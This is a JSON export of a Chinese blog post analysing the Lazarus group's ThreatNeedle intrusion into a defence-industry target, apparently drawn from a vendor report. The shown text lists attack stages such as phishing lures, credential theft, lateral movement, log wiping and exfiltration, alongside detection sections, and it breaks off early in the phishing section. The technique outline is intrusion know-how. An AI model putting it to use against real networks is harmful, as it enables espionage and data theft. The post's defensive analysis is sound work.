{"id":780,"date":"2021-08-20T17:20:48","date_gmt":"2021-08-20T09:20:48","guid":{"rendered":"http:\/\/weizn.net\/?p=780"},"modified":"2021-08-25T17:18:00","modified_gmt":"2021-08-25T09:18:00","slug":"apt%e6%8a%a5%e5%91%8a%e5%88%86%e6%9e%90%ef%bc%9alazarus%e7%bb%84%e7%bb%87%e9%92%88%e5%af%b9%e5%9b%bd%e9%98%b2%e5%b7%a5%e4%b8%9a%e7%9a%84%e4%b8%80%e6%ac%a1%e6%94%bb%e5%87%bb","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=780","title":{"rendered":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%80%E3%80%81%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC\" title=\"\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\">\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%BA%8C%E3%80%81C2%E7%A8%8B%E5%BA%8F%E6%9C%AC%E5%9C%B0%E6%A4%8D%E5%85%A5%E6%B5%81%E7%A8%8B\" title=\"\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b\">\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%89%E3%80%81ThreatNeedle%E5%AE%89%E8%A3%85%E5%99%A8%EF%BC%88Installer%EF%BC%89\" 
title=\"\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09\">\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%9B%9B%E3%80%81ThreatNeedle%E5%8A%A0%E8%BD%BD%E5%99%A8%EF%BC%88loader%EF%BC%89\" title=\"\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09\">\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%BA%94%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8\" title=\"\u4e94\u3001ThreatNeedle\u540e\u95e8\">\u4e94\u3001ThreatNeedle\u540e\u95e8<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%85%AD%E3%80%81%E5%90%8E%E5%88%A9%E7%94%A8%E9%98%B6%E6%AE%B5\" title=\"\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5\">\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B8%83%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\" title=\"\u4e03\u3001\u51ed\u636e\u6536\u96c6\">\u4e03\u3001\u51ed\u636e\u6536\u96c6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%85%AB%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\" title=\"\u516b\u3001\u6a2a\u5411\u79fb\u52a8\">\u516b\u3001\u6a2a\u5411\u79fb\u52a8<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=780\/#%E4%B9%9D%E3%80%81%E7%AA%81%E7%A0%B4%E7%BD%91%E7%BB%9C%E9%9A%94%E7%A6%BB\" title=\"\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb\">\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb<\/a><\/li><li class=\"ez-toc-page-1 
ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=780\/#%E5%8D%81%E3%80%81%E6%95%B0%E6%8D%AE%E6%B8%97%E5%87%BA\" title=\"\u5341\u3001\u6570\u636e\u6e17\u51fa\">\u5341\u3001\u6570\u636e\u6e17\u51fa<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=780\/#%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1\" title=\"\u68c0\u6d4b\u4e0e\u9632\u5fa1\">\u68c0\u6d4b\u4e0e\u9632\u5fa1<\/a><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><ul class=\"ez-toc-list-level-5\"><li class=\"ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=780\/#1%E3%80%81%E9%82%AE%E4%BB%B6%E6%B2%99%E7%AE%B1%E5%AF%B9%E4%BA%8E%E5%AE%8F%E6%96%87%E6%A1%A3%E7%9A%84%E6%A3%80%E6%B5%8B\" title=\"1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b\">1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=780\/#2%E3%80%81%E9%92%93%E9%B1%BC%E6%96%87%E6%A1%A3%E5%9C%A8%E5%8F%97%E5%AE%B3%E8%80%85%E7%94%B5%E8%84%91%E4%B8%8A%E6%89%A7%E8%A1%8C%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a\">2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E5%90%AF%E5%8A%A8%E7%9B%AE%E5%BD%95%E5%88%9B%E5%BB%BA%E6%96%87%E4%BB%B6\" 
title=\"1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6\">1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E5%AD%90%E8%BF%9B%E7%A8%8B%E8%BF%90%E8%A1%8Crundll32\" title=\"2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32\">2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=780\/#3%E3%80%81ThreatNeedle_Installer%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a\">3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E6%B3%A8%E5%86%8C%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E5%AE%9E%E7%8E%B0%E6%8C%81%E4%B9%85%E5%8C%96\" title=\"1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316\">1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E5%86%99%E5%85%A5%E5%88%B0%E6%B3%A8%E5%86%8C%E8%A1%A8\" title=\"2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868\">2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-19\" href=\"http:\/\/weizn.net\/?p=780\/#4%E3%80%81ThreatNeedle_Loader%E7%9A%84%E8%A1%8C%E4%B8%BA\" title=\"4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a\">4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-20\" 
href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E4%BB%8E%E6%B3%A8%E5%86%8C%E8%A1%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E9%85%8D%E7%BD%AE%E5%B9%B6%E4%B8%94%E8%A7%A3%E5%AF%86\" title=\"1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6\">1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E8%A7%A3%E5%AF%86payload%E5%90%8E%E4%BB%8E%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD\" title=\"2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d\">2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/weizn.net\/?p=780\/#5%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8%E8%A1%8C%E4%B8%BA\" title=\"5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a\">5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-23\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E6%96%87%E4%BB%B6%E6%B5%8F%E8%A7%88%E4%B8%8E%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96\" title=\"1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6\">1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-24\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E8%BF%9C%E6%8E%A7%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E8%A1%8C\" title=\"2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c\">2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-25\" 
href=\"http:\/\/weizn.net\/?p=780\/#6%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\" title=\"6\u3001\u51ed\u636e\u6536\u96c6\">6\u3001\u51ed\u636e\u6536\u96c6<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-26\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89responder%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E5%B7%A5%E5%85%B7\" title=\"1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177\">1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-27\" href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81\" title=\"2\uff09\u5f3a\u5236\u8ba4\u8bc1\">2\uff09\u5f3a\u5236\u8ba4\u8bc1<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-28\" href=\"http:\/\/weizn.net\/?p=780\/#3%EF%BC%89%E5%85%B6%E5%AE%83%E6%9C%AC%E5%9C%B0%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E6%96%B9%E5%BC%8F\" title=\"3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f\">3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-29\" href=\"http:\/\/weizn.net\/?p=780\/#7%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\" title=\"7\u3001\u6a2a\u5411\u79fb\u52a8\">7\u3001\u6a2a\u5411\u79fb\u52a8<\/a><ul class=\"ez-toc-list-level-6\"><li class=\"ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-30\" href=\"http:\/\/weizn.net\/?p=780\/#1%EF%BC%89%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BAIPC%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93\" title=\"1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053\">1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-31\" 
href=\"http:\/\/weizn.net\/?p=780\/#2%EF%BC%89wmi%E5%91%BD%E4%BB%A4%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6\" title=\"2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6\">2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-6\"><a class=\"ez-toc-link ez-toc-heading-32\" href=\"http:\/\/weizn.net\/?p=780\/#3%EF%BC%89%E7%99%BB%E5%BD%95%E6%88%90%E5%8A%9F%E5%A4%9A%E5%8F%B0windows_server\" title=\"3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server\">3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-33\" href=\"http:\/\/weizn.net\/?p=780\/#8%E3%80%81%E6%8E%A7%E5%88%B6%E4%BA%86IT%E7%AE%A1%E7%90%86%E5%91%98%E7%9A%84%E6%9C%BA%E5%99%A8%EF%BC%8Cdump%E6%B5%8F%E8%A7%88%E5%99%A8%E5%87%AD%E6%8D%AE\" title=\"8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e\">8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-34\" href=\"http:\/\/weizn.net\/?p=780\/#9%E3%80%81%E5%9C%A8%E5%91%98%E5%B7%A5%E7%94%B5%E8%84%91%E4%B8%8A%E4%BD%BF%E7%94%A8PuTTyPSCP%E5%B7%A5%E5%85%B7%E4%B8%8A%E4%BC%A0%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%B0server\" title=\"9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server\">9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-35\" 
href=\"http:\/\/weizn.net\/?p=780\/#10%E3%80%81NMAP%E6%89%AB%E6%8F%8F%E4%BA%86%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E4%B8%AD%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3\" title=\"10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3\">10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-36\" href=\"http:\/\/weizn.net\/?p=780\/#11%E3%80%81linux%E4%B8%8A%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E6%9F%A5%E7%9C%8B%EF%BC%8C%E4%BB%A5%E5%8F%8A%E9%80%9A%E8%BF%87rm%E5%91%BD%E4%BB%A4%E6%B8%85%E9%99%A4\" title=\"11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664\">11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-37\" href=\"http:\/\/weizn.net\/?p=780\/#12%E3%80%81%E4%BD%BF%E7%94%A8logrotate%E5%B7%A5%E5%85%B7%E6%B8%85%E9%99%A4linux%E6%97%A5%E5%BF%97\" title=\"12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7\">12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-38\" href=\"http:\/\/weizn.net\/?p=780\/#13%E3%80%81http%E4%BB%A3%E7%90%86%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E7%AA%81%E7%A0%B4%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\" title=\"13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e\">13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-39\" 
href=\"http:\/\/weizn.net\/?p=780\/#14%E3%80%81%E5%9C%A8%E8%A2%AB%E6%8E%A7server%E4%B8%8A%E9%80%9A%E8%BF%87ssh%E5%88%9B%E5%BB%BA%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84ssh%E9%9A%A7%E9%81%93\" title=\"14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053\">14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-5\"><a class=\"ez-toc-link ez-toc-heading-40\" href=\"http:\/\/weizn.net\/?p=780\/#15%E3%80%81PuTTyPSCP%E5%B7%A5%E5%85%B7%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\" title=\"15\u3001PuTTyPSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e\">15\u3001PuTTyPSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e<\/a><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<p>Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u539f\u59cb\u62a5\u544a\uff1a<a 
href=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarus-targets-defense-industry-with-threatneedle.pdf\">lazarus-targets-defense-industry-with-threatneedle<\/a><\/p>\n<blockquote><p>\u672c\u6b21\u62a5\u544a\u7591\u4f3c\u662f\u9488\u5bf9\u4fc4\u7f57\u65af\u67d0\u673a\u6784\u7684\u4e00\u6b21\u653b\u51fb\u884c\u52a8\uff0c\u76ee\u7684\u83b7\u53d6\u77e5\u8bc6\u4ea7\u6743\u76f8\u5173\u6570\u636e\uff0c\u672c\u6587\u4f1a\u89e3\u8bfb\u653b\u51fb\u8005\u884c\u52a8\u8fc7\u7a0b\uff0c\u5e76\u7814\u7a76\u90e8\u5206\u73af\u8282\u7684\u68c0\u6d4b\u65b9\u5f0f\u3002<\/p><\/blockquote>\n<p>\u8be5\u7ec4\u7ec7\u5728\u5176\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\u90ae\u4ef6\u4e2d\u4f7f\u7528\u4e86COVID-19\u4e3b\u9898\uff0c\u901a\u8fc7\u516c\u5f00\u4fe1\u606f\u6536\u96c6\u76ee\u6807\u7684\u5de5\u4f5c\u4eba\u5458\uff0c\u901a\u8fc7\u9493\u9c7c\u83b7\u53d6\u521d\u6b65\u7acb\u8db3\u70b9\uff0c\u7136\u540e\u6536\u96c6\u51ed\u636e\u5e76\u6a2a\u5411\u79fb\u52a8\uff0c\u5e76\u5bfb\u627e\u76ee\u6807\u73af\u5883\u4e2d\u7684\u5173\u952e\u8d44\u4ea7\u3002\u5185\u7f51\u4e2d\u901a\u8fc7\u63a7\u5236\u8fb9\u754c\u8def\u7531\u5668\u5e76\u914d\u7f6e\u4ee3\u7406\uff0c\u7ed5\u8fc7\u4e86\u5185\u7f51\u7684\u7f51\u7edc\u9694\u79bb\u7b56\u7565\uff0c\u4ece\u800c\u4f7f\u4ed6\u4eec\u80fd\u591f\u5c06\u7a83\u53d6\u7684\u6570\u636e\u4ece\u9694\u79bb\u7f51\u7edc\u4f20\u8f93\u5230C2\u670d\u52a1\u5668\u4e0a\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-QyPFRTTS\"><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC\"><\/span>\u4e00\u3001\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p 
data-diff-id=\"ct-diff-id-V5ZXn8hi\">\u9c7c\u53c9\u5f0f\u7684\u7f51\u7edc\u9493\u9c7c\u88ab\u7528\u4e8e\u6076\u610f\u7a0b\u5e8f\u7684\u8f7d\u4f53\uff0c\u5728\u53d1\u52a8\u653b\u51fb\u4e4b\u524d\uff0cAPT\u7ec4\u7ec7\u7814\u7a76\u4e86\u5173\u4e8e\u76ee\u6807\u7ec4\u7ec7\u7684\u516c\u5f00\u4fe1\u606f\uff0c\u5e76\u786e\u5b9a\u4e86\u5c5e\u4e8e\u8be5\u516c\u53f8\u5404\u90e8\u95e8\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u53d1\u9001\u7684\u9493\u9c7c\u90ae\u4ef6\u8981\u4e48\u9644\u6709\u4e00\u4e2a\u6076\u610f\u7684Word\u6587\u6863\uff0c\u8981\u4e48\u6709\u4e00\u4e2a\u6076\u610fWord\u4e0b\u8f7d\u94fe\u63a5\u3002 \u8fd9\u4e9b\u9493\u9c7c\u90ae\u4ef6\u4f2a\u9020\u6210\u662f\u533b\u7597\u4e2d\u5fc3\u64b0\u5199\uff0c\u5185\u5bb9\u662f\u5173\u4e8e\u5f53\u4eca\u6700\u70ed\u95e8\u7684\u8bdd\u9898&#8211;COVID-19\u75c5\u6bd2\u611f\u67d3\u7684\u7d27\u6025\u901a\u77e5\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-795\" title=\"0a5c6ff4a911159517dda27795d5ef89-10\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10.png\" alt=\"0a5c6ff4a911159517dda27795d5ef89-10\" width=\"610\" height=\"395\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10.png 1262w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-768x498.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-1170x758.png 